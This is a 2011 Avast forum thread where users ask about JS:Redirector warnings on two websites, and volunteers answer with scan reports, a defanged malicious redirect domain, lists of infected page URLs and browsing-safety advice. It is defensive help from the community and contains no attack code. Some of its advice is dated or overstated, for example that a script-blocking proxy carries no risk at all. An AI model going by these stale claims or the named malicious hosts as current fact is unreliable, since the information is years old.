Avast WEBforum
Other => Viruses and worms => Topic started by: grinlord on September 09, 2011, 03:29:40 PM
-
Hi. My friend runs a company with this website:
hxxp://www.nationwidegutters.co.uk/
However, when I try to visit it, Avast blocks it claiming an infection of JS:Redirector.
I don't have any virusses on my PC, I have checked it on other PC's also running Avast, they all show the same warning. I have asked the AVG online link scanner to check it, and it is reported clean. The web host also reports it clean.
Is this a false positive?
How do I enable access or get Avast to overcome this?
Thanks,
Alex.
-
The site is infected with malcious script:
Web site: -http://www.nationwidegutters.co.uk/
status: Site infected with malware
web trust: Not Blacklisted
See: http://sucuri.net/malware/malware-entry-mwiframehd203
Make the link you gave non-click-throug like -hhtp or htxp or wXw
also see: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1315575290&type=js
where a iFrame is re-directing to: -http://maseoi1l4f.c0m.li/i/fttpp27vecher,
a known dangerous site, see: http://www.urlvoid.com/scan/maseoi1l4f.c0m.li
Inline suspicious script found by unmasked parasites:
http://www.unmaskparasites.com/security-report/#report = FOOTER virus-XSS worm code
polonus
-
see attached screen shot (click to enlarge)
VirusTotal - HTML scan - 10/44
http://www.virustotal.com/file-scan/report.html?id=1d04b8aa4c424c8aed3fd8a7714bd0c0565035e476d50e8531cebc5a46361ea1-1315861827
-
So if other some anti-virus programs don't detect this malicious script, are they just not doing their job properly?
The domain and web host have reported that there is nothing wrong with it.
What's the next step, show them the above code?
-
1. So if other some anti-virus programs don't detect this malicious script, are they just not doing their job properly?
2. The domain and web host have reported that there is nothing wrong with it.
3. What's the next step, show them the above code?
1. Yep.
2. They're wrong.
3. Just link to this topic.
-
Lol. Thus confirming my allegiance with Avast.
I have forwarded the link to this page. We shall see...
-
Information for Website Owners http://stopbadware.org/home/webmasters
Tips for Cleaning & Securing Your Website http://www.stopbadware.org/home/security
Protect your interwebs with Sucuri http://sucuri.net/signup - http://sucuri.net/
-
Unfortunately, JustHost.com seem to be refusing to investigate the problem. They have asked us to visit http://www.google.com/webmasters/tools/ for the page to be reviewed.
I don't understand how that will help. There is malicious code in the site. That's surely the web host's responsibility. Perhaps they are assuming the code is stuck in Google's cache?
-
Hi everyone
A question regarding this js:Redirector-KE [Trj] alert -
A forum I frequently visit has been infected by this script, how will it affect my personal computer if I do log in to the forum?
I did some reading about this, and from what I gather this is mainly about placing redirect scripts in web sites. So how does it affect me, as the end user?
Just to clarify: Avast IS blocking my access to the forum, but when I access a specific thread (from a link in a notification email) I do manage to access the site. And that has happened yesterday, when I wasn't aware of the problem. Then, when I tried accessing the forum from the browser, I got the "Threat has been detected" alert, and then I ran the scan - and Avast did find infected files on my computer.
So, my question is, how were those infected files affecting me? Assuming this is only redirect scripts, what could it have done to my computer?
And, should I wait for the site owner to clean those redirects, or is it no risk for me to access it anyway?
I hope this is not a stupid question to ask ;D Its just that I'm no security expert, and the only info I have is based on what I read in the last couple of days regarding this issue.
So I would love it if someone here could clarify this a bit more for me.
Thank you 8)
Stav.
-
Hi Stav,
I would rather go to the site via a proxy, like http://www.idoproxy.com/
Your visit is secure and you can normally visit it.
See: http://urlquery.net/report.php?id=3860
Also see the rescan I made: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1317237014&type=js
Level: 1) Url checked: (script source)
-http://www.nationwidegutters.co.uk/ac_runactivecontent.js (VBS-Malware gen)
Blank page / could not connect *
No ad codes identified
So I think the site has been cleansed now,
polonus
-
Hi Stav,
I would rather go to the site via a proxy, like http://www.idoproxy.com/
Your visit is secure and you can normally visit it.
See: http://urlquery.net/report.php?id=3860
Also see the rescan I made: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1317237014&type=js
Level: 1) Url checked: (script source)
-http://www.nationwidegutters.co.uk/ac_runactivecontent.js (VBS-Malware gen)
Blank page / could not connect *
No ad codes identified
So I think the site has been cleansed now,
polonus
Hi D.,
I don't think he's refering to the OP's site. ;)
asyn
-
Hi Stav,
I would rather go to the site via a proxy, like http://www.idoproxy.com/
Your visit is secure and you can normally visit it.
See: http://urlquery.net/report.php?id=3860
Also see the rescan I made: http://wepawet.iseclab.org/view.php?hash=afaab6506b810acf917fe62026a33ee4&t=1317237014&type=js
Level: 1) Url checked: (script source)
-http://www.nationwidegutters.co.uk/ac_runactivecontent.js (VBS-Malware gen)
Blank page / could not connect *
No ad codes identified
So I think the site has been cleansed now,
polonus
Hi D.,
I don't think he's refering to the OP's site. ;)
asyn
True, I was referring to a different site (and I'm a she :)).
And the forum I'm talking about is still infected according to my Avast (but I know the site owner is working on cleaning it).
I was just wondering how will it affect me to access it anyway. Anyone knows?
What does this virus do to the user's computer?
Polonus, thank you for the proxy tip & link, didn't know I could do that. Cheers.
-
1. and I'm a she :).
2. I was just wondering how will it affect me to access it anyway.
1. Sorry then.
2. Just don't go there until it's clean. ;)
-
1. and I'm a she :).
2. I was just wondering how will it affect me to access it anyway.
1. Sorry then.
2. Just don't go there until it's clean. ;)
1. No problem at all :)
2. Yeah, but why? How is that redirecting script a problem for my personal computer? (Not trying to be a smartass :) just wanting to understand)
-
Hi stavstav,
Redirecting scripts can mean real trouble depending as to what silent download site you are actually being redirected to by a particular malscript. If you give us the non-cklickable URL written like hxtp or -http or wXw, we can scan the site for the actual redirecting script that is there, and give you an explanation about the established risks involved. I absolutely won't go to a site flagged in that way. That is why I advised that particular proxy, because the script will then stay at that security proxy site. You can also decide to disable javascript on the proxysite and then you do not run any risk whatsoever.
That is why a lot of educated browser users have NoScript add-on installed in Firefox or the NotScripts extension in Google Chrome (easy to toggle, great for protection) installed, so redirecting and other javascript malware cannot get to endanger their comp via their browsing.
Malcoded (obfuscated) javascript is one main online browsing threats as there are furthermore malicious iFrame (also function through malcoded javascript), SQL attacks etc..
So now I hope you understand why you have to take notice as avast rings an alarm via one of the shields while visiting a particular infected site. The avast guys do everything to be as accurate as can be in flagging these threat-sites, believe me. And I keep an eye out every day that there isn't a single suspicious URL that does not enter that avast sinkhole (as there are others like for instance Pondus, Asyn, spg Scott, and many others here),
polonus
-
Hi stavstav,
Redirecting scripts can mean real trouble depending as to what silent download site you are actually being redirected to by a particular malscript. If you give us the non-cklickable URL written like hxtp or -http or wXw, we can scan the site for the actual redirecting script that is there, and give you an explanation about the established risks involved. I absolutely won't go to a site flagged in that way. That is why I advised that particular proxy, because the script will then stay at that security proxy site. You can also decide to disable javascript on the proxysite and then you do not run any risk whatsoever.
That is why a lot of educated browser users have NoScript add-on installed in Firefox or the NotScripts extension in Google Chrome (easy to toggle, great for protection) installed, so redirecting and other javascript malware cannot get to endanger their comp via their browsing.
Malcoded (obfuscated) javascript is one main online browsing threats as there are furthermore malicious iFrame (also function through malcoded javascript), SQL attacks etc..
So now I hope you understand why you have to take notice as avast rings an alarm via one of the shields while visiting a particular infected site. The avast guys do everything to be as accurate as can be in flagging these threat-sites, believe me. And I keep an eye out every day that there isn't a single suspicious URL that does not enter that avast sinkhole (as there are others like for instance Pondus, Asyn, spg Scott, and many others here),
polonus
Thank you Polonus for the detailed reply, I appreciate that.
The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.
As for idoproxy - I forgot to update you guys, but accessing the abeforum via idoproxy still gets Avast to alert the threat and block it.
I did try the marking idoproxy's "block scripts" option and then accessing the forum, and that worked ok for the forum's main page, but then I couldn't navigate to any sub forums / specific threads (the screen would remain empty, except for the
Home" link that leads back to idoproxy.
Again, thank you very much for the detailed answer.
I'll wait to see what your scan will yield.
Stav.
-
The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.
Sucuri: http://sucuri.net/malware/malware-entry-mwjs159 (See screenshot)
-
The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.
Sucuri: http://sucuri.net/malware/malware-entry-mwjs159 (See screenshot)
Asyn, what does all this mean? (sorry, I'm clueless at that.. :))
-
The site I'm talking about is: wxw.abeforum.com - it would be great if you could have a look.
Sucuri: http://sucuri.net/malware/malware-entry-mwjs159 (See screenshot)
Asyn, what does all this mean? (sorry, I'm clueless at that.. :))
Click on the link. ;)
-
Click on the link. ;)
I'll clarify my question (I did click on the link before asking) -
what does "The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running." mean?
What is "the desktop" - is that my personal computer?
And what are "multiple AVs" (what's an AV)?
-
Hi stavstav,
The message you clicked on is intended for webmasters whose websites got infected through an infected desktop computer with that particular script. The virus is a so-called password stealer and all of the website code will become infected through it eventually and then it will try to infect unprotected users that visit those infected sites to further infect, and so on and so forth.
So as long as the site is still infected with this particular malscript, please stay away from it and inform the webmaster there that he should cleanse his site or get help to get it cleansed. You could ask him to visit this thread for info.
He initially got infected through a wordpress vulnerability via timthumb.php: see: http://wewatchyourwebsite.com/wordpress/tag/string-prototype-testharc/
Despite of the fact that the site is given clean here: http://urlquery.net/report.php?id=3949
and also here: http://siteinspector.comodo.com/public/reports/383186
Sucuri still marks it as infected here:
-http://www.abeforum.com/forum.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/register.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/faq.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/search.php?s=f8a062fcd4000c2527b41933393b23fa&do=getdaily&contenttype=vBForum_Post
-http://www.abeforum.com/calendar.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/memberlist.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/forumdisplay.php?s=f8a062fcd4000c2527b41933393b23fa&do=markread&markreadhash=guest
-http://www.abeforum.com/showgroups.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/search.php?s=f8a062fcd4000c2527b41933393b23fa
-http://www.abeforum.com/search.php?s=f8a062fcd4000c2527b41933393b23fa for Google UA
The infected status is confirmed here: http://www.UnmaskParasites.com/security-report/?page=www.abeforum.com verdict: 1 suspicious inline script found
The hoster of the site Ace Data Centers, Inc. = AS11798 has 1967 Blacklisted URLs (not reassuring these security data) What is going on via these blacklisted URL's, a whole scala of
online malevolence, like there are:
...malicious URLs? Yes
...badware? Yes
...botnet C&C servers? Yes
...exploit servers? Yes
...Zeus botnet servers? No
...Current Events? Yes
...phishing servers? Yes
...spam servers? No
...spam bots? Yes
...spam activity? No (above info found here: http://sitevet.com/db/asn/AS11798)
polonus